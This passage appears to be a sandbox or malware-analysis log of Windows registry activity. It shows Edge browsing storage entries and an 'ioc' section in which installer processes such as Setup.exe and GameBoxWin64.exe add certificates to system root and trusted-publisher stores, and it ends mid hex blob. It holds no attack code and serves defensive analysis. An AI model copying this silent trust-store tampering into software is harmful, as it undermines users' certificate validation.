Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\adfreevision.com\Total = "76" MicrosoftEdgeCP.exe
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\norton.com\Total = "438" MicrosoftEdgeCP.exe
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content MicrosoftEdge.exe
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing MicrosoftEdge.exe
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory RuntimeBroker.exe
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\norton.com\Total = "478" MicrosoftEdgeCP.exe
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{3FE80A8A-997D-4B48-B39E-1DBCE172A1E1} = "0" MicrosoftEdge.exe
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState MicrosoftEdgeCP.exe
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root MicrosoftEdge.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{20EP1MI0-142C-L17D-YD26-2GCP283P3KMT} svchost.exe
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" MicrosoftEdge.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" RuntimeBroker.exe
Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000e93f7fe209c35de5b375f380c2a98e897929d8454d561a16decba7bf2277f3b6515164ecd22e86d45d5273b3fdd79027021f2841d89987423479 MicrosoftEdge.exe
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" powershell.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node Setup.tmp
Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 2b3621958996d701 MicrosoftEdge.exe
Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates\4EEF7FAF0062D34AB MicrosoftEdge.exe
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\norton.com\Total = "406" MicrosoftEdgeCP.exe
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" MicrosoftEdge.exe
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\adfreevision.com MicrosoftEdgeCP.exe
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing MicrosoftEdgeCP.exe
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\norton.com\Total = "98" MicrosoftEdgeCP.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" MicrosoftEdge.exe
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState\EdpCleanupState = "0" MicrosoftEdgeCP.exe
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\allhotfeed.com\Total = "850" MicrosoftEdgeCP.exe
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\allhotfeed.com\Total = "159" MicrosoftEdgeCP.exe
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1" MicrosoftEdge.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe
Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\en-US = "en-US.1" MicrosoftEdge.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe
-
description ioc Process
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B Setup.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA Setup.tmp
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob GameBoxWin64.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob =
2d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be GameBoxWin64.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 
0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13
f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 Setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 
0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603
551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC Setup.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 
0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201
561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be Setup.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 
04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff0404
03020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Setup (19).exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 
5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311